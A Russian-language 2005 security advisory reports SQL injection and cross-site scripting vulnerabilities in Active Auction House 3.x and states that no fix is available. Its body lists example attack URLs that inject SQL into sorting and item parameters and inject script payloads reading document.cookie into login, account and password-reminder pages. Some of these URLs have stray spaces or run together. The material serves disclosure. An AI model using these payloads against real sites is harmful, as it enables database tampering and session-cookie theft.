Security Lab

SQL-инъекция и Межсайтовый скриптинг в Active Auction House

Дата публикации:11.04.2005
Всего просмотров:1206
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2005-1029
CVE-2005-1030
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Active Auction House 3.x
Уязвимые версии: Active Auction House

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных уязвимого приложения.

Уязвимость существует из-за недостаточной обработки входных данных в некоторых переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Примеры:

http://[target]/activeauctionsuperstore/default.asp?
Sortby=ItemName&SortDir='SQL_INJECTION

http://[target]/activeauctionsuperstore/default.asp?
Sortby='SQL_INJECTION

http://[target]/activeauctionsuperstore/ItemInfo.asp?
itemID='SQL_INJECTION

http://[ta rget]/activeauctionsuperstore/default.asp?
catid='SQL_ERROR

Межсайтовый скриптинг возможен из-за недостаточной фильтрации входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/activeauctionsuperstore/?ReturnURL=
'%3E%3Cscript%3Eale rt(document.cookie)%3C
/script%3E&username=dcrab&password=

http://[target]/activeauctionsuperstore/?ReturnURL=
start.asp&username=dcrab&password='%3E%3C
script%3Ealert(do cument.cookie)%3C/script%3E

http://[target]/activeauctionsuperstore/?ReturnURL=
start.asp&username='%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E&&password=

http://[target]/activeauctionsuperstore/account.asp?
ReturnURL=%22%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E

http://[target]/activeauctionsuperstore/sendpassword.asp?
Table=Accounts&Title='php_evil_valuehttp://localhost/
activeauctionsuperstore/sendpassword.asp?Table=
Accounts&Title=%22%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3 E

http://[target]/activeauctionsuperstore/sendpassword.asp?
Table=Accounts&Title="><script>alert
(document.cookie)</script>

http://[target]/activeauctionsuperstore/se ndpassword.asp?
Table="><script>alert(document.cookie)</script>&Title=Account

http://[target]/activeauctionsuperstore/watchthisitem.asp?itemid="
><script>alert(document. cookie)</script>&amp%3baccountid=

URL производителя: www.activewebsoftwares.com/productinfo.aspx?productid=24

Решение: Способов устранения уязвимости не существует в настоящее время.
Ссылки: Active Auction House has multiple Sql injection, error and XSS vulnerabilities